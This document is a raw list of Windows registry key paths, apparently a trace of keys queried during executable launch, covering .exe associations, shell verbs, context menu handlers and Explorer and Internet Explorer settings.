HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\Generation
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.NamespaceCLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{00021401-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\DataHandler
HKEY_CLASSES_ROOT\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\ShellEx\DataHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}\SuppressionPolicy
HKEY_CLASSES_ROOT\CLSID\{596AB062-B4D2-4215-9F74-E9109B0A8153}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{7BA4C740-9E81-11CF-99D3-00AA004AE837}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{F3D06E7C-1E45-4A26-847E-F9FCDEE59BE0}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\shellex\NoAddToRecent
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{6C467336-8281-4E60-8204-430CED96822D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\flags
HKEY_CLASSES_ROOT\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{A470F8CF-A1E8-4F65-8335-227475AA5C46}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\shellex\NoAddToRecent
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{09799AFB-AD67-11D1-ABCD-00C04FC30936}
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09799AFB-AD67-11d1-ABCD-00C04FC30936}\flags
HKEY_CLASSES_ROOT\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{00F3C2EC-A6EE-11DE-A03A-EF8F55D89593}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{1D27F844-3A1F-4410-85AC-14651078412D}\shellex\MayChangeDefaultMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DropTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\SupportedProtocols
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\runas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DropTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\SupportedProtocols
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\runasuser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\CredUI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\CredUI
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_CLASSES_ROOT\CLSID\{37EA3A21-7493-4208-A011-7F9EA79CE9F5}\shellex\MayChangeDefaultMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\LinkHandler
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_CLASSES_ROOT\.adp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
